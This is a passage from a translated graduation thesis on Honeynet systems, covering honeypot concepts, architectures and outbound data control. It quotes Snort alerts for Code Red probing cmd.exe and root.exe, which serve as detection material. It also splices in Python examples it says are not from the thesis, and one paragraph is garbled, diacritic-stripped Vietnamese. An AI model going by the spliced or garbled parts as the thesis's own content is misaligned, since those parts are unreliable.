Graduation Thesis
Academy of Cryptography Techniques, Faculty of Information Security

TABLE OF CONTENTS
LIST OF FIGURES ..... 3
PREFACE ..... 4
Chapter I. OVERVIEW OF THE HONEYNET SYSTEM ..... 6
1. HONEYPOT ..... 6
1.1. The concept of a Honeypot ..... 6
1.2. Classification of Honeypots ..... 9
2. Honeynet ..... 10
2.1. The concept of a Honeynet ..... 10
2.2. Functions of a Honeynet ..... 12
2.3. Some Honeynet deployment models around the world ..... 13
3. Role and significance of the Honeynet ..... 17
CHAPTER II. HONEYNET ARCHITECTURE MODELS ..... 18
1. Physical architecture models ..... 18
1.1. Generation I Honeynet architecture ..... 18
1.2. Generation II and III Honeynet architecture ..... 20
1.3. Virtual Honeynet systems ..... 21
2. Logical architecture model of the Honeynet ..... 23
2.1. Data control module ..... 24
2.1.1. Role and tasks of the data control module ..... 24
2.1.2. Data control mechanisms ..... 26
2.1.3. Data control in Honeynet II ..... 28
2.2. Data capture module ..... 33
2.2.1. Role and tasks of the data capture module ..... 33
2.2.2. Data capture mechanisms ..... 34
2.3. Data analysis module ..... 40
2.3.1. Role ..... 40
2.3.2. Data analysis mechanisms ..... 40
Chapter III. SOME ATTACK TECHNIQUES AGAINST WEB SERVICES ..... 43
Basic attack techniques ..... 45
Security risks of web services ..... 45
Session hijacking (Session Management) ..... 45
Exploiting weaknesses in input validation ..... 45
Denial of Service (DoS) ..... 46
SQL Injection attacks ..... 46
The concept of SQL Injection ..... 46
Common forms of attack ..... 47
Countermeasures ..... 56
Injecting code executed in the victim's browser (Cross-Site Scripting) ..... 59
Introduction to XSS ..... 59
Traditional XSS attack methods ..... 60
XSS attacks using Flash ..... 61
Countermeasures ..... 62
Denial of service attacks (DoS) ..... 63
Concept ..... 63
Risks of DoS attacks ..... 64
Some common forms of attack ..... 64
Countermeasures ..... 68
The latest attack techniques ..... 69
The padding oracle crypto attack ..... 69
Evercookie ..... 70
Autocomplete attacks ..... 70
HTTPS attacks via cache injection ..... 70
Bypassing CSRF protection with ClickJacking and HTTP Parameter Pollution ..... 70
Universal XSS in IE8 ..... 70
HTTP POST DoS ..... 70
JavaSnoop ..... 71
CSS history attack in Firefox without JavaScript, for port scanning inside an internal network ..... 71
Java Applet DNS Rebinding ..... 71
General summary of the hacker's attack process ..... 71
Chapter IV. DEPLOYING, INSTALLING AND OPERATING THE HONEYNET SYSTEM ..... 74
1. Practical deployment model ..... 74
2. Installing and configuring the Honeynet system ..... 75
2.1. Installing and configuring the Honeywall ..... 75
2.2. Installing and configuring Sebek ..... 86
3. Operating the Honeynet and analysing the hacker's attack techniques ..... 88
Attack scenario ..... 88
Analysing the hacker's attack technique ..... 89
How the hacker carries out the attack on the website ..... 89
Using the Honeynet to analyse the hacker's attack technique ..... 97
Remarks on the analysis results and remediation of the SQL injection flaw in the attacked website ..... 108
4. Honeynet applications in practice today ..... 110
CONCLUSION ..... 111

LIST OF FIGURES
Figure 1.1 - Types of Honeypot ..... 9
Figure 1.2 - Honeynet architecture model ..... 11
Figure 1.3 - Deployment diagram of the Artemis project, Peking University, China ..... 13
Figure 1.4 - Honeynet deployment diagram of the Greek Honeynet Project ..... 14
Figure 1.5 - Honeynet deployment diagram of the UK Honeynet Project ..... 16

PREFACE

Today, information technology is developing at breakneck speed. Alongside the positive aspects and the enormous benefits that the information society brings to humanity, there are also negative aspects, such as: the risk of network attacks aimed at sabotaging network systems, and the risk of theft of sensitive information belonging to individuals, organisations, enterprises and state agencies. To prevent these threats, agencies, organisations and enterprises must build network security systems to protect their own networks. Among the countless countermeasures available, the "Honeypot" (literally, a pot of honey) and the "Honeynet" (literally, a honeycomb) are considered among the most effective traps designed for this purpose. To intruders, these systems are truly fearsome traps; for that reason, the hacker community regularly posts updates on hacker forums about newly deployed Honeynet systems around the world, so as to avoid falling into them. Unlike other network security systems, such as intrusion detection and prevention systems (IDS - IPS) and firewalls, which are designed to work passively in detecting and blocking attacks by intruders (hackers) on the network,

a Honeynet is designed to actively lure the hacker into attacking a decoy system placed alongside the real system, with the following aims:

Collecting the attack techniques and methods and the tools that hackers use, especially new network attack techniques and new virus and malware samples. This helps us detect early the security vulnerabilities present in the information technology products deployed and installed on the real system, so that countermeasures and fixes can be applied in time. At the same time, it also tests the security of the network and its services (such as Web, DNS, Mail, ...) and the security, reliability and quality of other commercial information technology products (especially operating systems such as Unix, Linux, Windows, ...).

Collecting information and traces of the hacker (such as the IP address of the machine the hacker attacks from, the hacker's geographical location, the time of the attack, ...), which helps network security experts trace the perpetrator. However, because of limited time, this graduation thesis presents only

the study of Honeypot and Honeynet systems as a means of studying a number of attack techniques against web services, thereby helping us detect early and promptly fix the security vulnerabilities present in web services. I hope that the research presented below will help us understand the Honeynet system, together with its important role and effect in the task of ensuring network security today.


Chapter I. OVERVIEW OF THE HONEYNET SYSTEM


This chapter presents general, basic knowledge about Honeynets, including: the origin and development of the Honeynet; the concepts of Honeypot and Honeynet and the classification of Honeypots; and the functions, role and significance of the Honeynet in the task of ensuring network security, together with some Honeynet deployment models around the world.

1. HONEYPOT

1.1. The concept of a Honeypot

The Honeypot is a new technology with enormous potential for the security community. The first definitions were given by a few icons of computer security, namely Cliff Stoll in the book The Cuckoo's Egg and Bill Cheswick in his paper. Since then, Honeypots have continued to develop into the powerful security tools we know today. The term Honeypot was first mentioned on 4 August 1999 in the paper "To Build a Honeypot" by Lance Spitzner, one of the founders of the Honeynet Project, which introduced the idea of building a Honeynet system for studying hackers' attack techniques so that attacks could be blocked in time. In June 2000 the Honeynet Project was founded by 30 network security experts from security companies such as Foundstone, Security Focus and Sourcefire, who volunteered to take part in non-profit research.


The Honeynet Project was deployed in 8 countries (the USA, India, Greece, ...) with 12 Honeynet stations, comprising 24 Unix systems and 19 Linux systems, together with a number of other systems such as SuSE 6.3, SuSE 7.1, Windows, ...

The first step to understanding Honeypots is to understand what a Honeypot is. Unlike a firewall or an IDS, a Honeypot does not solve one specific problem. Instead, it is a highly flexible tool that comes in many shapes and sizes. It can do anything from detecting encrypted attacks in IPv6 networks onwards. This flexibility is what gives the Honeypot its real power. It is also what makes it hard for an attacker to identify and understand.

A Honeypot is an information resource system built for the purpose of posing as a target to deceive illegitimate users and intruders, attract their attention and keep them away from the real system. A Honeypot can be thought of as a pot of honey; naturally, it must also contain sweet honey, that is, information resources that are valuable, sensitive and confidential, such as stock-market information, bank account details, national security secrets, ..., as bait to draw the hacker's attention and attack. "Information resource system" means that a Honeypot can pose as any kind of resource server, such as a Mail Server, Domain Name Server or Web Server, installed on any operating system, such as Linux (Red Hat, Fedora), Unix (Solaris), Windows (Windows NT, Windows 2000, Windows XP, Windows 2003, Vista, ...). The Honeypot interacts directly with the intruder and seeks to extract information about the intruder, such as the form of attack, the attack tools and the way the attack is carried out, instead of being the victim of the attack.

Advantages of Honeypots: the Honeypot is a very simple concept, yet it offers some powerful features.

Small data sets of high value: Honeypots collect a small amount of information. Instead of logging a GB of data a day, they only need to log one MB of data a day. Instead of generating 10,000 alerts a day, they may generate only 10. Remember, Honeypots only capture bad activity: any interaction with a Honeypot is, by definition, unauthorised or malicious. Honeypots thus reduce noise, collecting small data sets of high-value information that consist only of bad activity. This means it is far easier to analyse the data a Honeypot collects and derive value from it.

New tools and tactics: Honeypots are designed to capture everything that interacts with them, including tools and tactics never seen before.

Minimal resources: Honeypots require minimal resources, since they only capture bad activity. This means that a computer with 128 MB of RAM can easily handle an entire class B network sitting on an OC-12 link.

Encryption or IPv6: unlike most security technologies (such as IDS), Honeypots work well in encrypted or IPv6 environments. They do not distinguish between what interacts with them; they simply capture bad activity.

Information: Honeypots can collect detailed information.

Honeypots are a simple technology, with few mistakes or misconfigurations.



Disadvantages of Honeypots: like many technologies, Honeypots also have weaknesses. That is why they cannot replace existing technologies, but instead work alongside them.

Limited view: Honeypots can only monitor and capture activity that interacts directly with them. They will not capture attacks against other systems unless the attacker or threat also interacts with the Honeypot.

Risk: all security technologies carry risk. Firewalls risk being penetrated, encryption risks being broken, IDS sensors risk failing to detect attacks. Honeypots are no different: they risk being taken over by the bad guy and used to harm other systems. This risk varies between different Honeypots.


1.2. Classification of Honeypots

Honeypots are divided into two main types: low-interaction and high-interaction.

Low-interaction: the Honeypot only installs programs (such as Honeyd, BackOfficer Friendly, Specter, ...) that emulate services, applications and operating systems. This type carries low risk and is easy to deploy and maintain, but is limited in the services it offers.

High-interaction: the Honeypot installs and runs real services, applications and operating systems (such as a Honeynet). This type yields a high level of collected information, but carries high risk and is time-consuming to operate and maintain.

Figure 1.1 - Types of Honeypot

Some examples of the types of honeypot:
a) BackOfficer Friendly (BOF): a type of Honeypot that is very easy to operate and configure and can run on any version of Windows and Unix, but its drawback is that it can only interact with a few simple services such as FTP, Telnet and SMTP.
b) Specter: this is also a low-interaction Honeypot, but with better interaction capability than BackOfficer; this type of Honeypot can emulate over 14 ports and can raise alerts and be managed remotely. However, like BackOfficer, Specter has the drawback of being limited in the number of services and inflexible.
c) Honeyd:

* This type of Honeypot can listen on all TCP and UDP ports; its emulated services are designed to block and record attacks and to interact with the attacker in the role of a victim system.
* Honeyd now has many versions and can emulate around 473 operating systems.
* Honeyd is a low-interaction Honeypot with many advantages, but its drawbacks are that it cannot provide a real operating system for the intruder to interact with, and it has no alerting mechanism when it detects that the system has been compromised or is in danger.

2. Honeynet

2.1. The concept of a Honeynet

One of the main tools the Honeynet Project team uses to gather information is the Honeynet. A Honeynet differs from firewalls, intrusion detection and prevention systems and encryption systems in that, although all of these can protect the network and its resources, they all perform a defensive, passive task; a Honeynet, by contrast, is a system that actively lures and attracts the hacker's attention and attack in order to collect information about the hacker, such as: the hacker's attack techniques, the tools the hacker uses, new kinds of malware that have appeared, ....

A Honeynet (literally, a honeycomb) is a form of high-interaction honeypot. Unlike other honeypots, a Honeynet is a real system, exactly like a normal working network, and it provides real systems, applications and services such as Web, Mail, File server, ....

A Honeynet can be built and deployed at many agencies and organisations for many different purposes, for example: state agencies and enterprises can use a Honeynet to test the security of their network and to keep attackers away from the real system; agencies, organisations and enterprises working in network security can use a Honeynet to collect new kinds of malware such as viruses, worms, spyware, trojans, ..., so as to promptly write detection updates for their company's anti-virus product.

The most important component when deploying, building and installing a Honeynet is the Honeywall. The Honeywall is the gateway between the honeypots and the outside network. It operates at layer 2 as a bridge. All traffic entering and leaving the honeypots must pass through the Honeywall. To control this traffic, collect attack signatures and block hackers' attacks, the Honeywall uses two main tools:
* First, the Snort IDS (also called the IDS sensor), which consists of rules defining attack signatures and which captures packets.
* Second, the Iptables firewall, which consists of rules defining whether access from outside in or from inside out is allowed or denied, and which controls the traffic passing through the Honeywall.
Below is an example of a Honeynet:

Figure 1.2 - Honeynet architecture model

In this model the Honeywall has three network interfaces: eth0, eth1 and eth2. Interface eth0 connects to the Production Network, eth1 connects to the Honeypots, and the third interface connects to the Router. When a hacker attacks the system from the Internet, the Honeypots play the role of the real system, interact with the hacker and collect

information about the hacker such as: the IP address of the machine the hacker uses, the hacker's attack technique, the tools the hacker uses, .... All of this information is recorded on the Honeywall and used by network security experts to analyse the hacker's attack technique; from that, they assess the security level of the system and take timely measures to fix the weaknesses that exist in it.

2.2. Functions of a Honeynet

a. Data control: this function performs the following tasks:
- When the hacker uses malware (such as viruses, trojans, spyware, worms, ...) to penetrate the Honeynet, the two tools on the Honeywall, the Snort IDS and the Iptables firewall, control the activity of that malware and the actions the hacker performs on the system, and at the same time raise alerts so that the system administrator can handle them in time.
- Inbound traffic is not restricted, but outbound traffic is. This makes things very difficult for the hacker; indeed, if the Honeynet is well configured, the hacker cannot gather complete information about our system, which also means the hacker cannot successfully penetrate the network.
b. Data capture: as data enters, the honeynet examines and records all destructive activity and then analyses the intruder's motives. It is the Snort IDS on the Honeywall that performs this function. Based on the rules defining attack signatures, Snort decides whether an activity counts as destructive, and if so it logs it and raises alerts. In this way the hacker's entire attack process is recorded in detail.
c. Data analysis: the main purpose of a honeynet is to collect information. Once there is information, the user must be able to analyse it. Doing this well requires the analyst to have very good knowledge of network security


and a deep understanding of network attack techniques. For that reason the analysis is usually done by network security experts.
d. Data collection: when a deployment has several Honeynets, the data from each honeynet must be collected into a central source. Usually only large organisations and network security centres with a global reach deploy multiple honeynets, in particular companies that supply anti-virus products, such as Trend Micro, Symantec, .... Most organisations have only one honeynet.

2.3. Some Honeynet deployment models around the world

Below are some Honeynet deployment models around the world, built to study and collect information on hackers' attack techniques on the network:
a. Honeynet deployment model of Peking University, China

Figure 1.3 - Deployment diagram of the Artemis project, Peking University, China

Figure 1.3 is the deployment diagram of the Honeynet at Peking University, China, in a project called Artemis. At present the project runs on a Generation III Honeynet; the deployment consists of three honeypots with different operating systems: Red Hat Linux 9.0,

Windows XP and Windows 2000, plus virtual honeypots emulated with the honeyd program. In this model the Honeywall has three network interfaces: the first connects to an external Router; the second connects to the internal Honeypots; the third is securely connected to the Console machine. When a hacker attacks, the three Honeypots and the virtual Honeypots interact with the hacker and collect information about the hacker such as: the IP address of the machine the hacker uses, the tools the hacker uses, how the hacker penetrates the system, .... The hacker's whole attack process is recorded by the Honeywall, which raises alerts to inform the user.
b. Honeynet deployment model of the Honeynet Project in Greece

Figure 1.4 - Honeynet deployment diagram of the Greek Honeynet Project



Figure 1.4 is the deployment diagram of the Honeynet in the Greek Honeynet Project. The Honeynet uses Honeywall version roo-1.0.hw-189, one honeypot running Red Hat 9.0 (DNS Server) and four virtual honeypots emulated with honeyd running the operating systems MS Windows XP Pro SP1, Linux 2.4.20, Solaris 9 and Cisco 1601R IOS 12.1(5). In this model the Honeywall also has three network interfaces, and the deployment is much like the Peking University one, except that between the Console machine (Remote Management and Analysis Network) and the four virtual Honeypot machines there is an additional Firewall. This Firewall protects the Console machine even if the hacker gains control of the virtual Honeypots.
c. Honeynet deployment model of the Honeynet Project in the UK


Figure 1.5 - Honeynet deployment diagram of the UK Honeynet Project

Finally, figure 1.5 shows the Honeynet deployment diagram of the UK Honeynet Project. In this model they deploy four Honeypots with the operating systems Red Hat 7.3, Fedora Core 1, Sun Solaris 7 and Sun Solaris 9. This model is also much like the two above; the only difference is that the Console machine, besides connecting to the Honeywall, also connects to the Router and is protected by a Firewall placed between them.


3. Role and significance of the Honeynet

From the sections above, the role and significance of the Honeynet can be summarised as follows:

Honeynets help discover and collect hackers' attack methods and techniques and the tools they use, especially new attack techniques and new virus and malware samples. This makes it possible to analyse and identify hackers' attack targets, attack timing, attack techniques, ..., and from that to issue timely forecasts and early warnings so that everyone can take precautions. The most recent example is the warning by network security experts worldwide about the hacker attack wave using the Conficker worm on 1 April 2009. Because of the advance warning and the efforts of international network security experts, that attack wave did not unfold as the hackers had hoped. The Honeynet thus works as an early warning system.

The Honeynet is a safe, controlled test environment that helps detect early the security vulnerabilities present in the information technology products deployed and installed on the real system (especially zero-day vulnerabilities), so that countermeasures and fixes can be applied in time. At the same time, the honeynet helps test the security of the network and its services (such as Web, DNS, Mail, ...), and the security, reliability and quality of other commercial information technology products (especially operating systems such as Unix, Linux, Windows, ...).

Collecting information and traces of the hacker (such as the IP address of the machine the hacker attacks from, the hacker's geographical location, the time of the attack, ...), which helps network security experts trace the perpetrator.

Conclusion: through this chapter we have gained a basic understanding of the Honeynet, the role and purpose of building and deploying such a system, and some Honeynet models deployed around the world. In the next chapter we will look more closely at the architecture and operating principles of this system.


CHAPTER II. HONEYNET ARCHITECTURE MODELS

In the previous chapter we gained a basic understanding of the Honeynet. This chapter goes on to present the development of the Honeynet's physical architecture. It also presents the Honeynet's logical model, which helps us understand how a Honeynet operates, through the three modules of the logical model: the data control module, the data capture module and the data analysis module.

1. Physical architecture models

1.1. Generation I Honeynet architecture

The Generation I Honeynet consists of a separate network created behind a network access control device, usually a firewall, and all traffic into and out of the Honeynet must pass through the firewall. The Honeynet is placed on a network separate from the production network to reduce the security risk to the system.

Figure 2.1 - Physical architecture of the Generation I Honeynet



In this Generation I Honeynet the firewall and the Intrusion Detection System (IDS) are two independent systems. This is precisely the difference between Honeynet I and Honeynet II and III: in the Honeynet II and III models, the firewall and the IDS are combined into a single gateway system, the Honeywall. In the Honeynet the firewall controls the traffic into and out of the system, allowing the hacker to attack only the Honeynet and preventing the hacker from attacking the production network or turning the Honeynet into a tool for attacking outside networks. The firewall does this on the basis of rules that define whether access from outside in or from inside out is allowed or denied. Below is an illustration of some firewall (Check Point) rules for a Honeynet:

Figure 2.2 - Some firewall rules for a Honeynet

Besides the firewall, the Honeynet also has an intrusion detection system, Snort. Snort's task is to detect and block in time the attack techniques already known and defined in Snort's rule set (Snort rules define the signatures and patterns of network attacks). Snort inspects packet contents and compares them with the rule set. When Snort detects packets whose

contents endanger the network, it blocks those packets to stop the hacker's attack on the system and alerts the administrator. Below is an example of Snort alerts raised on detecting the Code Red worm spreading across the network through the web service:

[**] [1:1256:2] WEB-IIS CodeRed v2 root.exe access [**]
[Classification: Web Application Attack] [Priority: 1]
12/21-22:07:24.686743 216.80.148.118:2094 -> 10.1.1.106:80
TCP TTL:111 TOS:0x0 ID:17545 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0xE34143C1 Ack: 0x68B5B8F Win: 0x2238 TcpLen: 20

[**] [1:1002:2] WEB-IIS cmd.exe access [**]
[Classification: Web Application Attack] [Priority: 1]
12/21-22:08:50.889673 216.80.148.118:1864 -> 10.1.1.106:80
TCP TTL:111 TOS:0x0 ID:24785 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0xEEE40D32 Ack: 0x8169FC4 Win: 0x2238 TcpLen: 20

1.2. Generation II and III Honeynet architecture

The Generation II Honeynet was developed in 2002 and Generation III was released at the end of 2004. Essentially, Honeynet II and Honeynet III share the same architecture; the main difference is that Honeynet III improves deployment and management. The fundamental change in the architecture of Honeynet II and III compared with Honeynet I is the use of a single device, called the Honeywall (Honeynet Sensor), to handle both data control and data capture. The Honeywall combines the functions of the firewall and the IDS of the Honeynet I architecture, which makes deployment and management easier. The change in the Honeywall is mainly in the data control module. The Honeywall works at layer two (of the OSI model) as a bridge. Thanks to this change, Honeynet II and III make it hard for the attacker to discover that they are interacting with a Honeynet trap, because the two interfaces eth0 (connected to the network outside

the Honeynet, on the hacker's side) and eth1 (connected to the Honeynet) have no IP addresses. The Honeynet is therefore completely transparent to the hacker.
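The Snort alert records quoted in section 1.1 above are the raw material the Honeywall analyst works from. As an added example (not code from this thesis or from the Honeynet Project), the following Python parses that full-alert format into structured records and groups the priority-1 alerts per attacking source. The two records embedded in it are reproduced from the text above; the priority threshold used for triage is this example's own assumption.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the two Snort "full alert" records quoted in the text
# (Code Red v2 probing root.exe / cmd.exe on an IIS honeypot), separated by a
# blank line the way Snort writes consecutive records to its alert file.
SAMPLE_ALERTS = """\
[**] [1:1256:2] WEB-IIS CodeRed v2 root.exe access [**]
[Classification: Web Application Attack] [Priority: 1]
12/21-22:07:24.686743 216.80.148.118:2094 -> 10.1.1.106:80
TCP TTL:111 TOS:0x0 ID:17545 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0xE34143C1 Ack: 0x68B5B8F Win: 0x2238 TcpLen: 20

[**] [1:1002:2] WEB-IIS cmd.exe access [**]
[Classification: Web Application Attack] [Priority: 1]
12/21-22:08:50.889673 216.80.148.118:1864 -> 10.1.1.106:80
TCP TTL:111 TOS:0x0 ID:24785 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0xEEE40D32 Ack: 0x8169FC4 Win: 0x2238 TcpLen: 20
"""

# Line 1: "[**] [gid:sid:rev] message [**]"
HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
# Line 2: "[Classification: ...] [Priority: n]"
CLASS_RE = re.compile(r"^\[Classification: (.+?)\] \[Priority: (\d+)\]$")
# Line 3: "MM/DD-HH:MM:SS.usec src:port -> dst:port"
FLOW_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+)$")
# Line 4: "PROTO TTL:n TOS:0x.. ID:n IpLen:n DgmLen:n [flags]"
IP_RE = re.compile(r"^(\w+) TTL:(\d+) TOS:(\S+) ID:(\d+) IpLen:(\d+) DgmLen:(\d+)")


@dataclass
class SnortAlert:
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    timestamp: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    ttl: int
    dgm_len: int


def parse_alerts(text: str) -> List[SnortAlert]:
    """Split a Snort full-alert file into records and parse each one."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        if len(lines) < 4:
            continue  # truncated record or stray line: skip rather than guess
        head = HEADER_RE.match(lines[0])
        cls = CLASS_RE.match(lines[1])
        flow = FLOW_RE.match(lines[2])
        ip = IP_RE.match(lines[3])
        if not (head and cls and flow and ip):
            raise ValueError(f"unrecognised alert record: {lines[0]!r}")
        alerts.append(SnortAlert(
            gid=int(head.group(1)), sid=int(head.group(2)), rev=int(head.group(3)),
            msg=head.group(4),
            classification=cls.group(1), priority=int(cls.group(2)),
            timestamp=flow.group(1),
            src_ip=flow.group(2), src_port=int(flow.group(3)),
            dst_ip=flow.group(4), dst_port=int(flow.group(5)),
            proto=ip.group(1), ttl=int(ip.group(2)), dgm_len=int(ip.group(6)),
        ))
    return alerts


def triage_by_source(alerts: List[SnortAlert], max_priority: int = 1) -> Dict[str, dict]:
    """Group the most severe alerts per attacking IP: who is probing, which
    honeypot services they touched and which signatures fired. Snort
    priority 1 is the most severe, so max_priority=1 keeps only those."""
    summary: Dict[str, dict] = defaultdict(
        lambda: {"alerts": 0, "targets": set(), "sids": []})
    for a in alerts:
        if a.priority > max_priority:
            continue
        entry = summary[a.src_ip]
        entry["alerts"] += 1
        entry["targets"].add(f"{a.dst_ip}:{a.dst_port}")
        entry["sids"].append(a.sid)
    return dict(summary)


if __name__ == "__main__":
    for ip, info in triage_by_source(parse_alerts(SAMPLE_ALERTS)).items():
        print(ip, info)
```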

Figure 2.3 - Architecture of the Generation II and III Honeynet

1.3. Virtual Honeynet systems

Deploying and building a Honeynet requires a large amount of hardware, depending on the scale of the Honeynet we need to deploy. To reduce the cost of investing in so much hardware, a new Honeynet architecture was proposed: the virtual Honeynet. In essence this model is still basically the same as Honeynet II and III and still uses a Honeywall gateway; the difference is that the virtual Honeynet is a new physical architecture that deploys almost the entire Honeynet on a single machine (one physical host). The aim is to reduce the cost of building the Honeynet and make it easier to manage. The two options for deploying a virtual Honeynet are the VMware software and User Mode Linux, which allow many virtual machines to be created on one physical computer. Of these, VMware is a commercial product, a supported solution designed to run several operating system environments at once. VMware runs only on the Intel architecture, so only operating systems for the Intel architecture work with VMware. User

Mode Linux (UML) is an open-source solution with similar features; however, UML is currently limited to the Linux operating system. Besides its advantages, the virtual Honeynet also has some limitations, namely that it is restricted to the operating systems and architectures supported by the software.

Figure 2.4 - Virtual Honeynet architecture

The diagram above consists of two physical computers: the first is the Honeynet gateway (with the Honeywall installed), which operates as in the Honeynet II and III models, performing data control and data capture for the Honeynet. On the second machine, several virtual machine operating systems are installed, each of which is a honeypot.

In summary: of the Honeynet architectures above, the virtual Honeynet is the most common today. However, the operation of the Honeynet in this model is still the same as in Honeynet II and III, and basically the same as in Honeynet I. The following presentation of the Honeynet's logical architecture will give us a clear understanding of how the Honeynet operates.


2. Logical architecture model of the Honeynet

Whatever model or generation a Honeynet is built on, it has the following common logical architecture:

[Figure 2.5 labels: Honeynet system; information flow; data control policy (IPtables + Snort); data capture (Sebek client-server); data storage; data analysis (Walleye); analysis results]

Figure 2.5 - Logical architecture of the Honeynet

A Honeynet comprises three main modules:
Data control module: this module's task is to control the data entering and leaving the Honeynet, to control the attacker's activity and to prevent the attacker from using the Honeynet to attack or harm other outside systems. For this task the Honeynet uses two main tools, the Iptables firewall and the Snort IDS.
Data capture module: this module's task is to collect information and to monitor and record the attacker's actions inside the Honeynet. For this task the Honeynet uses the Sebek client-server tool.
Data analysis module: this module's task is to support the analysis of the captured data in order to determine the hacker's techniques, tools and goals, and from that help

devise timely countermeasures. The Walleye and Hflow tools in the Honeynet perform this task.

Based on the Honeynet's logical architecture, the operation of the Honeynet can be summarised as follows. First, incoming traffic is controlled by the rule policy of the Iptables firewall (which consists of rules defining whether access from outside in or from inside out is allowed or denied, and which controls the traffic passing through the Honeywall) and by the rule policy of the Snort IDS (also called the IDS sensor, which consists of rules defining attack signatures). Next, the data capture module uses the Sebek client-server tool to collect information. The collected information is stored in the database (Data Store). Finally, with the support of the Walleye and Hflow tools, the analysis module analyses the contents of the information collected in the database and produces results showing whether the Honeynet is under attack and, if so, what kind of attack technique (for example DoS/DDoS, XSS, SQL injection, ...) the attacker is using, what tools the hacker is using, and so on. To give a fuller understanding of how the Honeynet operates, the thesis now analyses these three modules in more detail.

2.1. Data control module

2.1.1. Role and tasks of the data control module

When a Honeynet has no data control, the system faces major risks such as:
* The attacker can take control of the Honeynet and carry out destructive actions on the system.
* The attacker can abuse the Honeynet, turning it into a tool for attacking other outside networks...
Hence the requirement for a data control mechanism, specifically:
* First, to allow the attacker to attack inside the system while keeping the attacker's actions under control.
24 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

Honeynet

n Tt Nghip * Th hai l ngn chn, loi b cc tn cng ca k tn cng ra bn ngoi. Nhim v ca module iu khin d liu l ngn chn k tn cng s dng h thng mng Honeynet tn cng hay gy tn hi cho cc h thng bn ngoi khc. Khi mt honeypot bn trong Honeynet b hacker kim sot, chng ta phi kim ch hot ng v m bo honeypot khng b s dng gy tn hi cho cc h thng khc. Kim sot d liu lm gim nh nguy c e da, n kim sot hot ng ca k tn cng bng vic gii hn cc lung thng tin vo/ra trong h thng mng Nguy c e da y, l mt khi k tn cng gy tn hi ti h thng bn trong Honeynet, chng c th s dng chnh h thng Honeynet ny tn cng cc h thng khc bn ngoi h thng Honeynet. V d mt h thng no trn Internet. K tn cng phi b kim sot n khng th thc hin iu . Yu cu t ra l Modul iu khin d liu phi hot ng tt sao cho k tn cng ch thc hin cc tn cng vo h thng Honeynet m khng gy tn hi ti cc h thng khc bn ngoi. - Di y l m hnh kim sot d liu:

Figure 2.6 - Data control model

With this data control model, traffic entering the Honeynet is not restricted, but outgoing traffic is restricted and tightly controlled.

2.1.2. Data control mechanism

Data control is performed right at the gateway (Honeywall) and is based on two mechanisms:

* One is limiting the number of outbound connections.
* The other is filtering malicious packets (packet scrubbing).

To understand the data control mechanism, we examine each of these in turn.

a) Limiting the number of outbound connections

This mechanism allows any inbound connection but limits and controls the number of outbound connections; once the limit is reached, all subsequent outbound connections are blocked. It is implemented with the Iptables firewall: the firewall must count the outbound connections, and when a given limit is reached the system blocks any connections beyond it. This minimises the risk of the attacker using the Honeynet system as a tool to attack other external systems (because such activity requires opening many connections from inside the Honeynet to the outside). The limit is set by the administrator; there is no fixed rule for the data control module, and the system designer chooses limits appropriate to the actual situation based on the requirements and purpose of the system. If the number of outbound connections is increased, the hacker's attack activity can take place more freely, so we obtain more valuable information, but at the same time more danger is created. If few or no outbound connections are allowed, the risk is lower, but this arouses the attacker's suspicion, and they may discover that they are interacting with a Honeynet system. They may then carry out destructive actions such as deleting data or feeding in false information in order to undermine the integrity and availability of the information. In short, the number of outbound connections allowed depends on what we are trying to learn and on the amount of risk we are willing to accept. Typically, a Honeynet system allows between 10 and 20 outbound connections per day. To the hacker this number is flexible enough, much like opening an outbound connection to a tool or running a traditional IRC session, yet it is small enough to block most outbound attacks such as denial-of-service attacks or system scanning.

b) Filtering malicious packets (packet scrubbing)

This mechanism is responsible for detecting traffic that is dangerous to the system. Malicious packet filtering is usually performed by a network-level intrusion prevention system (NIPS); here it is the Snort IDS. The purpose of the NIPS is to detect and block known attacks that are defined in the NIPS rule set. The NIPS does this by inspecting every packet as it passes through the gateway, comparing the packet content with the existing database of attack patterns (the rules) in order to detect attack signatures. When attack traffic is detected, the system applies an appropriate countermeasure. In practice, the NIPS blocks attacks using two measures:

* The first is dropping the packet: the packet containing malicious content is discarded and not allowed out (blocking the attack). This measure is simple to implement but inflexible and easily arouses the hacker's suspicion.
* The second is replacing or modifying the packet: instead of dropping it, the NIPS replaces the content inside the packet so that it becomes harmless to the external system (neutralising the attack). The NIPS changes a few bytes inside the exploit code, rendering it ineffective, and allows it to continue outward. The hacker sees the attack launched as intended. This measure gives us better control over the intruder's behaviour and is very flexible, making it harder for the hacker to detect.

In summary, malicious packet filtering is carried out by a network-level intrusion prevention system (NIPS), which here is the Snort IDS.
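The outbound connection limit described above, as an added Python simulation written for this page (not the Honeynet Project's Honeywall code or its iptables rules): inbound connections are always allowed, outbound connections from each honeypot are counted per day, and once the administrator's limit is reached the rest are blocked. The honeypot addresses, the iptables-style log lines and the limit of 3 per day are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed for this example: the honeypot addresses behind the Honeywall.
HONEYPOTS = {"10.0.1.10", "10.0.1.11"}

# Constructed sample log in iptables LOG style: one inbound connection to a
# honeypot, then a burst of outbound connections from the compromised honeypot,
# one outbound connection from a second honeypot, and one on the next day.
SAMPLE_LOG = """\
Jun 12 09:10:01 honeywall kernel: HONEY: IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=10.0.1.10 PROTO=TCP SPT=51234 DPT=22
Jun 12 09:12:40 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.9 PROTO=TCP SPT=40001 DPT=6667
Jun 12 09:13:05 honeywall kernel: HONEY: IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=198.51.100.9 PROTO=TCP SPT=40002 DPT=80
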